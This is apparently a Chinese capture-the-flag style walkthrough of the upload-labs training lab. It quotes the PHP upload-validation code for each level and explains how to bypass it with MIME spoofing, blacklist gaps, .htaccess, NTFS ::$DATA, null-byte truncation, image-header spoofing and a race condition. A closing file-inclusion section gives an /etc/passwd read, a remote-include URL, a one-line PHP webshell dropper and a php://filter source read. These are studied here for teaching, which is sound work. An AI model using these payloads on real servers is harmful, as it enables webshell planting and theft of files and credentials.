Upload-labs
Pass-01
源码
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("请选择要上传的文件!");
return false;
}
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
var ext_name = file.substring(file.lastIndexOf("."));
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name + "|") == -1) {
var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
alert(errMsg);
return false;
}
}总结
前端JS校验,没啥总结的。就好比网上购物,没收到货就确认收货了。至于最后收到啥东西谁也不知道。
Pass-02
源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
}
}总结
$_FILES['upload_file']['type']获取上传文件的MIME类型。$_FILES官方解释:
实际上是根据http请求中的content-type字段定义的
MIME白名单image/jpeg、image/png、image/gif。
一是可以直接上传php文件(jsp[java]、asp(IIS)没用哈,不会被解析),抓包修改请求头中的content-type
二是修改文件后缀.php->.jpeg/.png/.gif之一,然后再抓包把后缀修改成.php(content-type根据上传文件的后缀自动变化)
Pass-03
源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
//$file_ext是经过strrchr函数洗礼过的,所以apache解析漏洞不管用
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}总结
$deny_ext变量定义了上传类型黑名单数组,然后后面一些列操作(什么去文件末尾的点啊,去除空格啊,去除::$DATA啊,转换为小写啊)都是提取上传文件后缀名的标准且必要的操作。然后利用in_array函数判断上传的文件后缀是否在黑名单中,不在的话就重命名文件。
所以
1..htaccess不管用,因为虽然没在黑名单中,但是上传后被命名为XXXX.htaccess
2.Apache解析漏洞不管用(test.php.aaa文件.aaa后缀apache不认识会被当作php文件解析),因为strrchr取得是.最后出现的位置也就是.aaa。重命名后就是xxxx.aaa。(详见代码注释)
突破点就是:
这是服务器端apache/conf/httpd.conf的配置文件,圈出来的文件会被当作php解析。而.php3和.phtml没有在黑名单中。
Pass-04
源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (!in_array($file_ext, $deny_ext)) {
//检测还是用$file_ext检测的
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
//这里拼接文件路径(文件名)的变量是file_name,可以上传test.php.aaa(apache解析漏洞)
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}总结
前端显示的源码是错误的,实际的源码没有对白名单文件进行重命名。
与Pass-03不一样的地方是$img_path变量在拼接的时候用的是$file_name变量(Pass-03用的是$file_ext),体会一下。
所以一种是网上大多数使用的上传.htaccess(没在黑名单中且未对白名单文件重命名)内容是AddType application/x-httpd-php .jpg然后再上传一个.jpg文件(含php内容)就可以把.jpg当作php解析
.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过.htaccess文件,可以实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能IIS平台上不存在该文件,该文件默认开启,启用和关闭在httpd.conf文件中配置。
第二种方法直接上传test.php.xxx,其中xxx可随意设置成apache不认识的稀有文件名,它可以帮我们绕过检测,但是最后在拼接的时候又使用的test.php.xxx,最后被当作test.php解析。得益于代码写的好(详见代码注释)。
第三种方法是上传test.php. .(php后面加上点空格点)。deldot不是自带函数,打开代码审计工具查找deldot函数如下:
<?php
function deldot($s){
for($i = strlen($s)-1;$i>0;$i--){
$c = substr($s,$i,1);
if($i == strlen($s)-1 and $c != '.'){
return $s;
}
if($c != '.'){
return substr($s,0,$i+1);
}
}
}
?>
可以看到test.php. .经过deldot的洗礼后去掉最后一个点,保留了test.php. 。然后是strrchr函数洗礼后就是. (空格)可以看到空格的作用就是保护空格前的.不被deldot删除掉。然后是strtolower、str_ireplace函数,最后trim函数删掉空格。所以$file_ext只剩一个点了,帮我们通过黑名单过滤。
最后拼接文件路径(文件名)的时候又是使用函数处理前的$file_name变量
window系统自动把文件名后面的.点、空格自动删除掉
其实和第二种方法差不多,只是没有配合apache解析漏洞(window去除空格、点后直接当作php解析),当然也可以结合使用(test.php.aaa. .)
Pass-05/Pass-06/Pass-07/Pass-08
源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
//05/06/07/08关在上面四行代码依次一关少一句
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
总结
Pass-05关缺失的代码:
$file_ext = strtolower($file_ext); //转换为小写
没有这行代码可使用大小写如.Php/.PHp/.pHP等等来绕过黑名单。这些文件照样被当作php文件执行
Pass-06关缺失的代码:
$file_ext = trim($file_ext); //首尾去空
抓包增加空格。window和linux系统文件名后缀都会自动过滤空格
Pass-07关缺失的代码:
$file_ext = strrchr($file_name, '.');
抓包增加点。window系统文件名后缀都会自动过滤点
linux环境下也可增加点再上传,linux下不会过滤文件名最后的点
Pass-08关缺失的代码
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
linux可直接上传test.php::$DATA文件
window环境上传的时候抓包修改Windows下NTFS文件系统的一个特性,即NTFS文件系统的存储数据流的一个属性 DATA 时,就是请求a.asp本身的数据,如果a.asp 还包含了其他的数据流,比如a.asp:lake2.asp,请求a.asp:lake2.asp::$DATA,则是请求a.asp中的流数据lake2.asp的流数据内容。
NTFS文件系统包括对备用数据流的支持。这不是众所周知的功能,主要包括提供与Macintosh文件系统中的文件的兼容性。备用数据流允许文件包含多个数据流。每个文件至少有一个数据流。在Windows中,此默认数据流称为:$DATA。
Pass-09
Pass-09和Pass-04代码一样,只是黑名单不一样(09加了.htaccess)。所以方法1不管用,方法2/3依旧管用。
Pass-10
源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
总结
可以看到$file_name = str_ireplace($deny_ext,"", $file_name),直接删除黑名单中的内容。但是这个代码凶起来连文件名的内容也删,这让我想起之前看的文章说不要试图修改用户的输入,直接禁止就行。
因为str_ireplace函数只使用了一次。直接使用双写绕过就行test.pphphp,因为php名字特殊,双写插入位置就有讲究了。为什么不使用test.phphpp自行理解。
Pass-11
源码
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
?>总结
$file_ext变量一顿花里胡哨的操作获取文件名后缀,并设置白名单(jpg、png、gif)。所以在文件名上做文章是不行了。关键是如下代码
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext
//$_GET和之前的$_POST差不多,主要是可以进行抓包修改,是可以注入的。然后通过
move_uploaded_file($temp_file,$img_path)函数利用
%00截断
截取的数据包,把标记的内容修改成../upload/test.php%00。这样实际是将1.jpg的内容移动到test.php文件中了。
因为$img_path变量是../upload/test.php%00xxx.jpg。在php版本<5.3.4且magic_quotes_gpc=off时
以上为服务器phpinfo中的信息。../upload/test.php%00xxx.jpg会被认为../upload/test.php
然后利用move_uploaded_file函数将临时路径下的jpg文件内容写入../upload/test.php中
Pass-12
源码
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传失败";
}
} else {
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}总结
与Pass-11不一样的地方是Pass-12利用$_POST获取save_path,此参数也是可注入的。只是修改的地方和Pass-11不一样,Pass-12在Hex数据流中修改(Hex将报文中的字符全部转换成16进制)
$_GET
$_POST
%00和0x00截断
原理都是一样的,都是利用16进制的00截断原理 。
Pass-11中对url进行解码。将%00解码成0x00,而Pass-12中没有url解码这一步,直接在hex的值中修改。形成0x00截断。
Pass-13
源码
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只读2字节
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}总结
Pass-13源码中利用getReailFileType函数中fread函数读取文件开头两个字符,并利用unpack函数将字符转换成ascii码值,最后用intval连接取整(值为$typeCode)。
然后判断$typeCode为255216(0xff,0xd8)、13780(0x89,0x50)、7173(0x47,0x49),如下图是三种文件类型的文件头标识
JPG
PNG
GIF
随便上传个什么后缀的文件(反正源码中最后会对$img_path重新修改后缀),如下:
本例用的txt文件,第一行内容是空格+P(随便两个字符就行,因为空格hex值是20-对应的ascii是32,便于在后续burp抓包中查找修改。当然也可以输入两个以上的字符,因为源码中只提取前两个字符。)
然后上传、抓包:
在Hex中修改数据:
上传成功后经过源码中的$img_path变量将文件名修改成对应的jpg、png、gif后缀,所以需要通过文件包含去解析漏洞:
该实验中专门提供了个include.php
Pass-14
源码
function isImage($filename){
$types = '.jpeg|.png|.gif';
if(file_exists($filename)){
$info = getimagesize($filename);
$ext = image_type_to_extension($info[2]);
if(stripos($types,$ext)>=0){
return $ext;
}else{
return false;
}
}else{
return false;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}总结
本Pass主要利用isImage函数来判断上传的文件是不是图片类型(不仅仅是三种常规类型图片)。来看看isImage函数干了什么事情:
首先利用getimagesize函数检测文件类型。getimagesize函数返回结果:
Array
(
[0] => 350
[1] => 318
[2] => 2//其中1 = GIF,2 = JPG,3 = PNG,4 = SWF,5 = PSD,6 = BMP,7 = TIFF(intel byte order),8 = TIFF(motorola byte order),9 = JPC,10 = JP2,11 = JPX,12 = JB2,13 = SWC,14 = IFF,15 = WBMP,16 = XBM
[3] => width="350" height="318"
[bits] => 8
[channels] => 3
[mime] => image/jpeg
)
然后利用image_type_to_extension函数对getimagesize函数返回的数组索引2(Array[2])作后缀名转换,最后用stripos函数检测image_type_to_extension函数返回的结果是否在变量$types白名单中。
所以关键就是getimagesize函数,它的工作原理是什么,什么样的文件会让它返回的数组的索引 2 为"白名单数字",怎么样去绕过它?
所以getimagesize函数不是绝对安全的,关键看怎么去使用它。对于本Pass只检测getimagesize($file)[2]的值,其绕过方式和Pass-13相似。只是文件头多保留几位罢了。
JPG:对于JPG文件保留的文件头标识就多一些了(10行左右),可以直接在JPG文件都加php木马,但是会有如下错误。PNG:89 50 4e 47 0d 0a 1a 0a(可以抓包修改hex,也可以找个真png,用编辑器打开,将文件头标识后面的内容替换成php木马就行)
GIF:GIF89a(直接在文件头加入,也可以抓包修改hex:47 49 46 38 39 61)
这是JPG因为文件内容有干扰PHP解析的数据出现,后删除部分内容上传后成功。
Pass-15
源码
function isImage($filename){
//需要开启php_exif模块
$image_type = exif_imagetype($filename);
switch ($image_type) {
case IMAGETYPE_GIF:
return "gif";
break;
case IMAGETYPE_JPEG:
return "jpg";
break;
case IMAGETYPE_PNG:
return "png";
break;
default:
return false;
break;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}总结
本Pass中使用的是exif_imagetype函数来检测上传的文件是否为图片,其返回值和Pass-14中getimagesize函数返回值的索引2是一样的,官方文档如下:
所以步骤也和Pass-14一致,只是对于JPG文件的表示头检测只用保留前面一行就行。(不确定)
Pass-16
源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
$filename = $_FILES['upload_file']['name'];
$filetype = $_FILES['upload_file']['type'];
$tmpname = $_FILES['upload_file']['tmp_name'];
$target_path=UPLOAD_PATH.'/'.basename($filename);
// 获得上传文件的扩展名
$fileext= substr(strrchr($filename,"."),1);
//判断文件后缀与类型,合法才进行上传操作
if(($fileext == "jpg") && ($filetype=="image/jpeg")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromjpeg($target_path);
if($im == false){
$msg = "该文件不是jpg格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".jpg";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagejpeg($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "png") && ($filetype=="image/png")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefrompng($target_path);
if($im == false){
$msg = "该文件不是png格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".png";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagepng($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "gif") && ($filetype=="image/gif")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromgif($target_path);
if($im == false){
$msg = "该文件不是gif格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".gif";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagegif($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else{
$msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
}
}总结
源码中使用imagecreatefrom...函数对图片文件进行二次渲染。该函数调用了PHP GD库(GD库,是php处理图形的扩展库),对图片进行了转换。
将一个正常显示的图片,上传到服务器。下载被渲染后与原始图片对比,在仍然相同的数据块部分内部插入Webshell代码,然后上传。
对于GIF找到一个payload,对于JPG和PNG就要复杂些了。参考
Pass-17
源码
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_ext = substr($file_name,strrpos($file_name,".")+1);
$upload_file = UPLOAD_PATH . '/' . $file_name;
if(move_uploaded_file($temp_file, $upload_file)){
if(in_array($file_ext,$ext_arr)){
$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
rename($upload_file, $img_path);
$is_upload = true;
}else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
unlink($upload_file);
}
}else{
$msg = '上传出错!';
}
}总结
本Pass解除了利用文件包含漏洞,仔细读代码发现源码中先判断move_uploaded_file函数是否执行成功,然后再判断上传的文件后缀名是否在白名单中,如果不在白名单中则用unlink函数删除文件。
可以通过条件竞争的方式在unlink函数执行之前访问上传文件。
burp suite抓上传info17.php文件的数据包,进行大量重放:
所以我们使用多线程并发的访问上传的文件,总会有一次在上传文件到删除文件这个时间段内访问到上传的php文件,一旦我们成功访问到了上传的文件,那么它就会向服务器写一个shell。
Pass-18
源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
require_once("./myupload.php");
$imgFileName =time();
$u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
$status_code = $u->upload(UPLOAD_PATH);
switch ($status_code) {
case 1:
$is_upload = true;
$img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
break;
case 2:
$msg = '文件已经被上传,但没有重命名。';
break;
case -1:
$msg = '这个文件不能上传到服务器的临时文件存储目录。';
break;
case -2:
$msg = '上传失败,上传目录不可写。';
break;
case -3:
$msg = '上传失败,无法上传该类型文件。';
break;
case -4:
$msg = '上传失败,上传的文件过大。';
break;
case -5:
$msg = '上传失败,服务器已经存在相同名称文件。';
break;
case -6:
$msg = '文件无法上传,文件不能复制到目标目录。';
break;
default:
$msg = '未知错误!';
break;
}
}myupload.php:
Pass-20
源码
$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
//检查MIME
$allow_type = array('image/jpeg','image/png','image/gif');
if(!in_array($_FILES['upload_file']['type'],$allow_type)){
$msg = "禁止上传该类型文件!";
}else{
//检查文件名
$file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
if (!is_array($file)) {
$file = explode('.', strtolower($file));//strtolower转换为小写,避免大小写
}//explode函数用'.'分割字符串,返回数组
$ext = end($file);
$allow_suffix = array('jpg','png','gif');
if (!in_array($ext, $allow_suffix)) {
$msg = "禁止上传该后缀文件!";
}else{
$file_name = reset($file) . '.' . $file[count($file) - 1];
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$msg = "文件上传成功!";
$is_upload = true;
} else {
$msg = "文件上传失败!";
}
}
}
}else{
$msg = "请选择要上传的文件!";
}
总结
文件命名规则:$file_name = reset($file) . '.' . $file[count($file) - 1];
reset():将内部指针指向数组中的第一个元素,并输出。
end():将内部指针指向数组中的最后一个元素,并输出。
$file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];如果save_name不为空则file为save_name,否则file为filename
if (!is_array($file))判断如果file不是数组则以'.'分组
我们POST传入一个save_name列表:['info20.php', '', 'jpg'],此时empty($_POST['save_name']) 为假则file为save_name,所以由$ext = end($file);为jpg可以通过后缀名判断(判断结束后最后一个元素jpg弹出),并且最终文件名组装为upload20.php.
通过上传一个php文件,原始的数据包如下:
因为源码中是先检测Content-Type,所以要修改。
所以关键就是count函数,在上图传输的数据包中count(save_name)是等于2的。
文件包含
远程包含和本地包含没有区别,无论是哪种扩展名,只要遵循PHP语法规范,PHP解析器就会对其解析
条件:
1.allow_url_include=On,允许include[_once]()、require[_once]()函数的使用
2.allow_url_fopen(),允许远程文件包含
其中test.txt(后缀名也可以是其他后缀名,都会被当作php解析)文件内容是:
<?php
echo "hello world";
?>
当然也可以是其他内容,如:
<?php
phpinfo(); //显示php配置等信息
?>只要文件内容符合php语法规范,任何扩展名都可以被php解析,如果文件内容不符合php语法规范,会显示源码.
上图中http://127.0.0.0.1/hackable/uploads/test.txt为传递到include函数中的参数
文件包含攻击方式:
1.读取敏感文件(条件:相应文件存在且有权限)
http://www.xxx.com/index.php?page=/etc/passwd
2.远程包含shell(条件:远程包含(allow_url_fopen)开启)
http://www.xxx.com/index.php?page=http://127.0.0.1/hackable/uploads/test.txt
test.txt文件内容为:
<?fputs(fopen("shell.php","w"),"<?php eval($_POST[pass]);?>")?>访问后将会在index.php所在的目录下生成shell.php,内容为<?php eval($_POST[pass]);?>
3.本地包含配合文件上传(条件:提供文件上传功能且一句话木马图片已上传)
图片上传路径为/uploads/test.jpg,代码为:
<?fputs(fopen("shell.php","w"),"<?php eval($_POST[pass]);?>")?>访问http://www.xxx.com/index.php?page=./uploads/test.jpg,访问后将会在index.php所在的目录下生成shell.php,内容为<?php eval($_POST[pass]);?>
4.php://filter/read=convert.base64-encode/resource=config.php
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用。你还可以使用@来通知其他用户。